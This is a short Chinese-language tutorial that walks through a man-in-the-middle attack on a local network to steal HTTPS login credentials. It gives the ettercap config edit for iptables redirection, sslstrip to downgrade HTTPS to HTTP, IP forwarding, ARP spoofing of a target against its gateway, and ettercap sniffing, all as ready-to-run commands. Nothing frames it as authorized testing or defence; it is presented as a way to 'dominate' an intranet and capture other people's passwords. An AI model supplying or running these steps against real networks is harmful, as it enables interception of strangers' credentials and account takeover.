内网称霸之《HTTPS账号密码获取》

---

⭐使用工具：arpspoof、ettercap、sslstrip

一、将HTTPS转换成HTTP

在获取HTTPS账号、密码的操作前需要修改ettercap的设置，否则无法成功。 1.先编辑/etc/ettercap/etter.conf下的文件内容，更改ettercap设置； 1.1输入/etc/ettercap/etter.conf后找到： # if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 这个地方 2.改为（去掉两个#）： # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 3.输入sslstrip -a -f -k 实现https转换成http以获取帐号密码； 4.在该终端窗口下右键选择“复制SSH渠道(S)”； 5.接着直接使用HTTP账号密码获取的方法就可以了。

vim使用方法：
编辑：按下i；
保存并退出：按下Esc，然后按Shift和：(冒号)，按下wq，完后按回车；
不保存并退出：按下Esc，然后按Shift和：(冒号)，按下q!，完后按回车；

vim /etc/ettercap/etter.conf
i
删除两个#
Esc、Shift ：、wq、回车
sslstrip -a -f -k

二、ARP欺骗和抓包获取HTTPS账号和密码

echo 1 >/proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t 目标IP 目标主机网关
ettercap -Tq -i eth0